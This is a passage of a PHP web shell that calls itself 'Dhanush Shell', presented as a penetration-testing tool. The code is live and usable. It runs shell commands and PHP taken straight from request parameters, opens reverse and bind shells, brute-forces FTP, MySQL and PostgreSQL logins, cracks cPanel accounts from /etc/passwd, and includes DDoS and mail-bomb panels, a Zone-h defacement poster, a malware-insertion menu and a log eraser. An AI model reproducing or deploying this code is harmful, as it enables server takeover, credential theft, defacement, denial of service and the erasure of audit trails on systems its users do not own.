4894 </td>
4895 </tr>
4896
4897 <tr>
4898 <td align="center">
4899 <p>Using tempnam() function</p>
4900 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
4901 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
4902 </form>
4903 </td>
4904 <td align="center">
4905 <p>Using symlink() function</p>
4906 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
4907 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
4908 </form>
4909 </td>
4910 </tr>
4911 <tr>
4912 <td colspan=2 align="center">
4913 <p>Using Bypass function</p>
4914 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
4915 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
4916 <select id="optiontype" class=sbox>
4917 <option value="tac">tac</option>
4918 <option value="more">more</option>
4919 <option value="less">less</option>
4920 <option value="rev">rev</option>
4921 <option value="xxd">xxd</option>
4922 <option value="awk">awk</option>
4923 </select>
4924 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
4925 </form>
4926 </td>
4927
4928 </tr>
4929 </table>
4930 </form>
4931 <?php
4932}
4933//fuzzer
4934else if(isset($_GET['fuzz']))
4935{
4936 ?>
4937 <form method="GET">
4938 <table id="margins">
4939 <tr>
4940 <td width="400" class="title">
4941 IP
4942 </td>
4943 <td>
4944 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4945 </td>
4946 </tr>
4947
4948 <tr>
4949 <td class="title">
4950 Port
4951 </td>
4952 <td>
4953 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4954 </td>
4955 </tr>
4956
4957 <tr>
4958 <td class="title">
4959 Timeout
4960 </td>
4961 <td>
4962 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
4963 </td>
4964 </tr>
4965
4966
4967 <tr>
4968 <td class="title">
4969 No of times
4970 </td>
4971 <td>
4972 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4973 </td>
4974 </tr>
4975
4976 <tr>
4977 <td class="title">
4978 Message (The message Should be long and it will be multiplied with the value after it)
4979 </td>
4980 <td>
4981 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4982 </td>
4983 <td>
4984 x
4985 </td>
4986 <td width="20">
4987 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4988 </td>
4989 </tr>
4990
4991 <tr>
4992 <td rowspan="2">
4993 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
4994 </td>
4995 </tr>
4996 </table>
4997 </form><div id="showdos"></div>
4998 <?php
4999}
5000// Zone-h Poster
5001 else if(isset($_GET["zone"]))
5002 {
5003 if(!function_exists('curl_version'))
5004 {
5005 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
5006 }
5007 ?>
5008 <center><font size="4">Zone-h Poster</font></center>
5009 <form action="<?php echo $self; ?>" method="post">
5010 <table align="center" cellpadding="5" border="0">
5011 <tr>
5012 <td>
5013 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
5014 <tr><td>
5015 <select name="hackmode" class="box">
5016 <option >--------SELECT--------</option>
5017 <option value="1">known vulnerability (i.e. unpatched system)</option>
5018 <option value="2" >undisclosed (new) vulnerability</option>
5019 <option value="3" >configuration / admin. mistake</option>
5020 <option value="4" >brute force attack</option>
5021 <option value="5" >social engineering</option>
5022 <option value="6" >Web Server intrusion</option>
5023 <option value="7" >Web Server external module intrusion</option>
5024 <option value="8" >Mail Server intrusion</option>
5025 <option value="9" >FTP Server intrusion</option>
5026 <option value="10" >SSH Server intrusion</option>
5027 <option value="11" >Telnet Server intrusion</option>
5028 <option value="12" >RPC Server intrusion</option>
5029 <option value="13" >Shares misconfiguration</option>
5030 <option value="14" >Other Server intrusion</option>
5031 <option value="15" >SQL Injection</option>
5032 <option value="16" >URL Poisoning</option>
5033 <option value="17" >File Inclusion</option>
5034 <option value="18" >Other Web Application bug</option>
5035 <option value="19" >Remote administrative panel access bruteforcing</option>
5036 <option value="20" >Remote administrative panel access password guessing</option>
5037 <option value="21" >Remote administrative panel access social engineering</option>
5038 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
5039 <option value="23" >Access credentials through Man In the Middle attack</option>
5040 <option value="24" >Remote service password guessing</option>
5041 <option value="25" >Remote service password bruteforce</option>
5042 <option value="26" >Rerouting after attacking the Firewall</option>
5043 <option value="27" >Rerouting after attacking the Router</option>
5044 <option value="28" >DNS attack through social engineering</option>
5045 <option value="29" >DNS attack through cache poisoning</option>
5046 <option value="30" >Not available</option>
5047 </select>
5048 </td></tr>
5049 <tr><td>
5050 <select name="reason" class="box">
5051 <option >--------SELECT--------</option>
5052 <option value="1" >Heh...just for fun!</option>
5053 <option value="2" >Revenge against that website</option>
5054 <option value="3" >Political reasons</option>
5055 <option value="4" >As a challenge</option>
5056 <option value="5" >I just want to be the best defacer</option>
5057 <option value="6" >Patriotism</option>
5058 <option value="7" >Not available</option>
5059 </select></td></tr>
5060 <tr><td>
5061 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
5062 <tr><td>
5063 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
5064 </form><div id="showzone"></div>
5065 <?php }
5066//DDos
5067 else if(isset($_GET['dos']))
5068 {
5069 ?>
5070 <form method="GET">
5071 <table id="margins">
5072 <tr>
5073 <td width="400" class="title">
5074 IP
5075 </td>
5076 <td>
5077 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
5078 </td>
5079 </tr>
5080
5081 <tr>
5082 <td class="title">
5083 Port
5084 </td>
5085 <td>
5086 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
5087 </td>
5088 </tr>
5089
5090 <tr>
5091 <td class="title">
5092 Timeout <font >(Time in seconds)</font>
5093 </td>
5094 <td>
5095 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
5096 </td>
5097 </tr>
5098 <tr>
5099 <td class="title">
5100 Execution Time <font >(Time in seconds)</font>
5101 </td>
5102 <td>
5103 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
5104 </td>
5105 </tr>
5106 <tr>
5107 <td class="title">
5108 No of Bytes per/packet
5109 </td>
5110 <td>
5111 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
5112 </td>
5113 </tr>
5114 <tr>
5115 <td rowspan="2">
5116 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
5117 </td>
5118 </tr>
5119 </table>
5120 </form><div id="showdos"></div>
5121 <?php
5122}
5123else if(isset($_GET['mailbomb']))
5124{ ?>
5125 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
5126 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
5127<?php
5128}
5129else if(isset($_GET['tools']))
5130 {
5131 ?>
5132 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
5133 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
5134 <tr>
5135 <td colspan="2" align="center"><b><font size='4'>Port Scanner<br></font></b></td>
5136 </tr>
5137 <tr>
5138 <td align="center">
5139 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
5140 </td>
5141 <td align="center">
5142 <select class="sbox" name='protocol'>
5143 <option value='tcp'>tcp</option>
5144 <option value='udp'>udp</option>
5145 </select>
5146 </td>
5147 <tr>
5148 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
5149 </tr>
5150 </form>
5151 <tr><td colspan=2><div id="showports"></div>
5152 </td></tr></table>
5153
5154 <br>
5155 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
5156 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
5157 <tr>
5158 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
5159 </tr>
5160 <tr>
5161 <td>Type : </td>
5162 <td>
5163 <select name="prototype" class="sbox">
5164 <option value="ftp">FTP</option>
5165 <option value="mysql">MYSQL</option>
5166 <option value="postgresql">PostgreSql</option>
5167 </select>
5168 </td>
5169 </tr>
5170 <tr>
5171 <td>Server <b>:</b> Port : </td>
5172 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
5173 </tr>
5174 <tr>
5175 <td valign="middle">Brute type : </td>
5176 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
5177 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
5178 Login : <input type="text" name="login" value="root" class="sbox"><br>
5179 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
5180 </td>
5181 </tr>
5182 <tr>
5183 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
5184 </tr>
5185 </form><tr><td colspan="2" id="showbrute"></td></tr>
5186 </table>
5187 </center><br>
5188 <?php
5189}
5190else if (isset($_GET["phpc"]))
5191{
5192 ?>
5193 <div id="showresult"></div>
5194 <form name="frm">
5195 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
5196 <br /><br />
5197 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
5198 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
5199 </form>
5200 <?php
5201}
5202else if(isset($_GET["exploit"]))
5203{
5204 if(!isset($_GET["rootexploit"]))
5205 {
5206 ?>
5207 <center>
5208 <form action="<?php echo $self; ?>" method="get" target="_blank">
5209 <input type="hidden" name="exploit">
5210 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
5211 <tr>
5212 <td style="height:60px;">
5213 <font size="4" class=txt>Select Website</font></td><td>
5214 <p><select id="rootexploit" name="rootexploit" class="box">
5215 <option value="exploit-db">Exploit-db</option>
5216 <option value="packetstormsecurity">Packetstormsecurity</option>
5217 <option value="exploitsearch">Exploitsearch</option>
5218 <option value="shodanhq">Shodanhq</option>
5219 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
5220 <input type="submit" value="Search" class="but"></td></tr></table>
5221 </form></center><br>
5222
5223 <?php
5224 }
5225 else
5226 {
5227 //exploit search
5228 $Lversion = php_uname(r);
5229 $OSV = php_uname(s);
5230 if(eregi('Linux',$OSV))
5231 {
5232 $Lversion=substr($Lversion,0,6);
5233 if($_GET['rootexploit'] == "exploit-db")
5234 {
5235 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Lversion&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5236 }
5237 else if($_GET['rootexploit'] == "packetstormsecurity")
5238 {
5239 header("Location:http://www.packetstormsecurity.org/search/?q=Linux+Kernel+$Lversion");
5240 }
5241 else if($_GET['rootexploit'] == "exploitsearch")
5242 {
5243 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
5244 }
5245 else if($_GET['rootexploit'] == "shodanhq")
5246 {
5247 header("Location:https://exploits.shodan.io/?q=$Lversion+platform:\"linux\"");
5248 }
5249 }
5250 else
5251 {
5252 $Lversion=substr($Lversion,0,3);
5253 if($_GET['rootexploit'] == "exploit-db")
5254 {
5255 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5256 }
5257 else if($_GET['rootexploit'] == "packetstormsecurity")
5258 {
5259 header("Location:http://www.packetstormsecurity.org/search/?q=$OSV+Lversion");
5260 }
5261 else if($_GET['rootexploit'] == "exploitsearch")
5262 {
5263 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
5264 }
5265 else if($_GET['rootexploit'] == "shodanhq")
5266 {
5267 header("Location:https://exploits.shodan.io/?q=$OSV+platform:\"windows\"");
5268 }
5269 }
5270 //End of Exploit search
5271 }
5272}
5273// Connect
5274else if(isset($_REQUEST['connect']))
5275{
5276 ?>
5277 <form action='<?php echo $self; ?>' method='POST' >
5278 <table style="width:50%" align="center" >
5279 <tr>
5280 <th colspan="1" width="50px">Reverse Shell</th>
5281 <th colspan="1" width="50px">Bind Shell</th>
5282 </tr>
5283 <tr>
5284 <td>
5285 <table style="border-spacing: 6px;">
5286 <tr>
5287 <td>IP </td>
5288 <td>
5289 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
5290 </td>
5291 </tr>
5292 <tr>
5293 <td>Port </td>
5294 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
5295 </tr>
5296 <tr>
5297 <td style="vertical-align:top;">Use:</td>
5298 <td><select style="width: 95px;" name="lang" class="sbox">
5299 <option value="perl">Perl</option>
5300 <option value="python">Python</option>
5301 <option value="php">PHP</option>
5302 </select>
5303 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
5304 </tr>
5305 </table> </form>
5306 </td>
5307
5308 <td style="vertical-align:top;">
5309 <form method='post' >
5310 <table style="border-spacing: 6px;">
5311 <tr>
5312 <td>Port</td>
5313 <td>
5314 <input style="width: 200px;" class="box" name="port" value="9891" />
5315 </td>
5316 </tr>
5317 <tr>
5318 <td>Password </td>
5319 <td>
5320 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
5321 </td>
5322 <tr>
5323 <td>Using</td>
5324 <td>
5325 <select style="width: 95px;" name="lang" id="lang" class="sbox">
5326 <option value="perl">Perl</option>
5327 <option value="c">C</option>
5328 </select>
5329 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
5330 </tr>
5331 </table>
5332 </td>
5333 </form>
5334 </tr>
5335 <tr><td colspan=2>Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</td></tr>
5336 </table>
5337
5338 <?php
5339 }
5340else if(isset($_REQUEST['subdomain']))
5341{
5342 ?>
5343 <center><form>
5344 <table>
5345 <tr>
5346 <td>Cpanel user : </td>
5347 <td><input type="text" name="cpaneluser" value="<?php echo get_current_user(); ?>" class="box" /></td>
5348 </tr>
5349 <tr>
5350 <td>Cpanel password : </td>
5351 <td><input type="password" name="cpanelpass" class="box" /></td>
5352 </tr>
5353 <tr>
5354 <td>Number of Subdomain : </td>
5355 <td><input type="text" name="noofsubdomain" class="box" value="10" /></td>
5356 </tr>
5357 <tr>
5358 <td valign="top">Index : </td>
5359 <td><textarea rows="7" cols="54" name="subindex" class="box">You just got Hacked</textarea></td>
5360 </tr>
5361 <tr>
5362 <td></td>
5363 <td><input type="button" value=" go " class="but" onClick="createsubdomain(cpaneluser.value,cpanelpass.value,noofsubdomain.value,subindex.value)" /></td>
5364 </tr>
5365 </table></center></form><br>
5366 <div id="showmydata"></div>
5367 <?php
5368}
5369else if(isset($_REQUEST['404']))
5370{
5371 ?>
5372 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
5373 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
5374 </tr></table></center><br>
5375 <div id="showdata"></div>
5376 <?php
5377}
5378else if(isset($_GET['about']))
5379 { ?>
5380
5381 <font class="om">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server. The developer of the script is not responsible for any damage or misuse of it.</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
5382 <?php }
5383else if(isset($_GET['database']))
5384{ ?>
5385 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
5386 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
5387 <tr>
5388 <td colspan="2">Connect To Database</td>
5389 </tr>
5390 <tr>
5391 <td>Server Address :</td>
5392 <td><input type="text" class="box" name="server" value="localhost"></td>
5393 </tr>
5394 <tr>
5395 <td>Username :</td>
5396 <td><input type="text" class="box" name="username" value="root"></td>
5397 </tr>
5398 <tr>
5399 <td>Password:</td>
5400 <td><input type="text" class="box" name="password" value=""></td>
5401 </tr>
5402
5403 <tr>
5404 <td></td>
5405 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
5406 </tr>
5407 </table>
5408 </form>
5409 <div id="showsql"></div>
5410<?php
5411}
5412// Cpanel Cracker
5413 else if(isset($_REQUEST['cpanel']))
5414 {
5415 $cpanel_port="2082";
5416 $connect_timeout=5;
5417 ?>
5418 <center>
5419 <form method=post>
5420 <table class="btmtbl" style="width:50%;" border=1 cellpadding=4>
5421 <tr>
5422 <td align=center>User names</td><td align=center>Password</td>
5423 </tr>
5424 <tr>
5425 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
5426 if($os != "Windows")
5427 {
5428 if(@file('/etc/passwd'))
5429 {
5430 $users = file('/etc/passwd');
5431 foreach($users as $user)
5432 {
5433 $user = explode(':', $user);
5434 echo $user[0] . "\n";
5435 }
5436 }
5437 else
5438 {
5439 $temp = "";
5440 $val1 = 0;
5441 $val2 = 1000;
5442 for(;$val1 <= $val2;$val1++)
5443 {
5444 $uid = @posix_getpwuid($val1);
5445 if ($uid)
5446 $temp .= join(':',$uid)."\n";
5447 }
5448
5449 $temp = trim($temp);
5450
5451 if($file5 = fopen("test.txt","w"))
5452 {
5453 fputs($file5,$temp);
5454 fclose($file5);
5455
5456 $file = fopen("test.txt", "r");
5457 while(!feof($file))
5458 {
5459 $s = fgets($file);
5460 $matches = array();
5461 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5462 $matches = str_replace("home/","",$matches[1]);
5463 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5464 continue;
5465 echo $matches;
5466 }
5467 fclose($file);
5468 }
5469 }
5470 }
5471
5472 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
5473 </tr>
5474 <tr>
5475 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
5476 </tr>
5477 </table>
5478 </form>
5479 </center>
5480 <?php
5481}
5482else if(isset($_REQUEST['malattack']))
5483{
5484 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
5485 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
5486 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
5487 <div id="showdata"></div>
5488 <?php
5489}
5490else if(isset($_GET["com"]))
5491{
5492 echo "<br>";
5493 ob_start();
5494 eval("phpinfo();");
5495 $b = ob_get_contents();
5496 ob_end_clean();
5497 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
5498 $z = strpos($b,"</body>");
5499 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
5500 echo $s_result;
5501}
5502else if(isset($_GET['execute']))
5503{
5504 $comm = $_GET['execute'];
5505 chdir($_GET['executepath']);
5506 $check = shell_exec($comm);
5507
5508 echo "<BR><center><textarea id=showexecute cols=100 rows=20 class=box>" . $check . "</textarea></center>";
5509
5510 ?>
5511 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
5512 <input type="text" class="box" name="execute">
5513 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but">
5514 <input type="button" onClick="cancel()" value="cancel" class="but" /></form></center><BR>
5515 <?php
5516}
5517else if(isset($_GET['mycmd']))
5518{
5519 if($_GET['mycmd']=="logeraser")
5520 {
5521 $erase = gzinflate(base64_decode("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"));
5522 if(is_writable("."))
5523 {
5524 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
5525 {
5526 fwrite($openp, $erase);
5527 fclose($openp);
5528 passthru("perl logseraser.pl linux");
5529 unlink("logseraser.pl");
5530 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5531 }
5532 } else
5533 {
5534 if($openp = fopen("/tmp/logseraser.pl", 'w'))
5535 {
5536 fwrite($openp, $erase)or die("Error");
5537 fclose($openp);
5538 $aidx = passthru("perl logseraser.pl linux");
5539 unlink("logseraser.pl");
5540 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5541 }
5542 }
5543 }
5544 else
5545 {
5546 $check = shell_exec($_GET['mycmd']);
5547 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
5548
5549 }
5550}
5551else if(isset($_GET['prototype']))
5552{
5553 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
5554 if( $_GET['prototype'] == 'ftp' )
5555 {
// FTP credential probe (defined only when $_GET['prototype'] == 'ftp').
// One call = one ftp_connect() + one ftp_login() + ftp_close(): every
// invocation produces a fresh connection and a separate authentication
// attempt at the target, which is the observable pattern on the FTP side.
// $port falls back to 21 when it is empty/0 (plain truthiness test).
// Returns false when the connection cannot be opened, otherwise the
// ftp_login() result. All errors are @-suppressed, so nothing is logged here.
5556 function BruteFun($ip,$port,$login,$pass)
5557 {
5558 $fp = @ftp_connect($ip, $port?$port:21);
5559 if(!$fp) return false;
5560 $res = @ftp_login($fp, $login, $pass);
5561 @ftp_close($fp);
5562 return $res;
5563 }
5564 }
5565 elseif( $_GET['prototype'] == 'mysql' )
5566 {
// MySQL credential probe (defined only when $_GET['prototype'] == 'mysql').
// Relies on the legacy mysql_* extension (removed in PHP 7.0), so it is a
// no-op on current PHP. The host argument is the expression
// `$ip.':'.$port?$port:3306` as written. The link, if any, is closed before
// the mysql_connect() result is returned; callers use it only for truthiness.
5567 function BruteFun($ip,$port,$login,$pass)
5568 {
5569 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
5570 @mysql_close($res);
5571 return $res;
5572 }
5573 }
5574 elseif( $_GET['prototype'] == 'pgsql' )
5575 {
// PostgreSQL credential probe (defined only when $_GET['prototype'] == 'pgsql').
// Builds a libpq key=value connection string by direct concatenation of the
// caller-supplied values and attempts a single pg_connect() against the
// 'postgres' database; the connection is closed before the result is returned.
// Errors are @-suppressed; each call is one connection + one auth attempt.
5576 function BruteFun($ip,$port,$login,$pass)
5577 {
5578 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
5579 $res = @pg_connect($str);
5580 @pg_close($res);
5581 return $res;
5582 }
5583 }
5584
5585 $success = 0;
5586 $attempts = 0;
5587 $server = explode(":", $_GET['server']);
5588
5589 if($_GET['type'] == 1)
5590 {
5591 $temp = @file('/etc/passwd');
5592 if( is_array($temp))
5593 foreach($temp as $line)
5594 {
5595 $line = explode(":", $line);
5596 ++$attempts;
5597 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
5598 {
5599 $success++;
5600 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
5601 }
5602 if(@$_GET['reverse'])
5603 {
5604 $tmp = "";
5605 for($i=strlen($line[0])-1; $i>=0; --$i)
5606 $tmp .= $line[0][$i];
5607 ++$attempts;
5608 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
5609 {
5610 $success++;
5611 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
5612 }
5613 }
5614 }
5615 }
5616 elseif($_GET['type'] == 2)
5617 {
5618 $temp = @file($_GET['dict']);
5619 if( is_array($temp) )
5620 foreach($temp as $line)
5621 {
5622 $line = trim($line);
5623 ++$attempts;
5624 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
5625 {
5626 $success++;
5627 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
5628 }
5629 }
5630 }
5631 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
5632}
5633// Execute Query
5634else if(isset($_GET["executeit"]))
5635{
5636 if(isset($_GET['username']) && isset($_GET['server']))
5637 {
5638 $dbserver = $_GET['server'];
5639 $dbuser = $_GET['username'];
5640 $dbpass = $_GET['password'];
5641 if(mysql_connect($dbserver,$dbuser,$dbpass))
5642 {
5643 setcookie("dbserver", $dbserver);
5644 setcookie("dbuser", $dbuser);
5645 setcookie("dbpass", $dbpass);
5646
5647 listdatabase();
5648 }
5649 else
5650 echo "cannotconnect";
5651 }
5652}
5653else if(isset($_GET['action']) && isset($_GET['dbname']))
5654
5655
5656 {
5657 if($_GET['action'] == "createDB")
5658 {
5659 $dbname = $_GET['dbname'];
5660 $dbserver = $_COOKIE["dbserver"];
5661 $dbuser = $_COOKIE["dbuser"];
5662 $dbpass = $_COOKIE["dbpass"];
5663 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5664 mysql_query("create database $dbname",$mysqlHandle);
5665 listdatabase();
5666 }
5667 if($_GET['action'] == 'dropDB')
5668 {
5669 $dbname = $_GET['dbname'];
5670 $dbserver = $_COOKIE["dbserver"];
5671 $dbuser = $_COOKIE["dbuser"];
5672 $dbpass = $_COOKIE["dbpass"];
5673 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5674 mysql_query("drop database $dbname",$mysqlHandle);
5675 mysql_close($mysqlHandle);
5676 listdatabase();
5677 }
5678
5679 if($_GET['action'] == 'listTables')
5680 {
5681 listtable();
5682 }
5683
5684 // Create Tables
5685 if($_GET['action'] == "createtable")
5686 {
5687 $dbserver = $_COOKIE["dbserver"];
5688 $dbuser = $_COOKIE["dbuser"];
5689 $dbpass = $_COOKIE["dbpass"];
5690 $dbname = $_GET['dbname'];
5691 $tablename = $_GET['tablename'];
5692 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5693 mysql_select_db($dbname);
5694 mysql_query("CREATE TABLE $tablename ( no INT )");
5695 listtable();
5696 }
5697
5698 // Drop Tables
5699 if($_GET['action'] == "dropTable")
5700 {
5701 $dbserver = $_COOKIE["dbserver"];
5702 $dbuser = $_COOKIE["dbuser"];
5703 $dbpass = $_COOKIE["dbpass"];
5704 $dbname = $_GET['dbname'];
5705 $tablename = $_GET['tablename'];
5706 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5707 mysql_select_db($dbname);
5708 mysql_query("drop table $tablename");
5709 listtable();
5710 }
5711
5712 // Empty Tables
5713 if($_GET['action'] == "empty")
5714 {
5715 $dbserver = $_COOKIE["dbserver"];
5716 $dbuser = $_COOKIE["dbuser"];
5717 $dbpass = $_COOKIE["dbpass"];
5718 $dbname = $_GET['dbname'];
5719 $tablename = $_GET['tablename'];
5720 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5721 mysql_select_db($dbname);
5722 mysql_query("delete from $tablename");
5723 listtable();
5724 }
5725
5726 // Empty Tables
5727 if($_GET['action'] == "dropField")
5728 {
5729 $dbserver = $_COOKIE["dbserver"];
5730 $dbuser = $_COOKIE["dbuser"];
5731 $dbpass = $_COOKIE["dbpass"];
5732 $dbname = $_GET['dbname'];
5733 $tablename = $_GET['tablename'];
5734 $fieldname = $_GET['fieldname'];
5735 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5736 mysql_select_db($dbname);
5737 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
5738 mysql_select_db( $dbname, $mysqlHandle );
5739 mysql_query( $queryStr , $mysqlHandle );
5740 listtable();
5741 }
5742
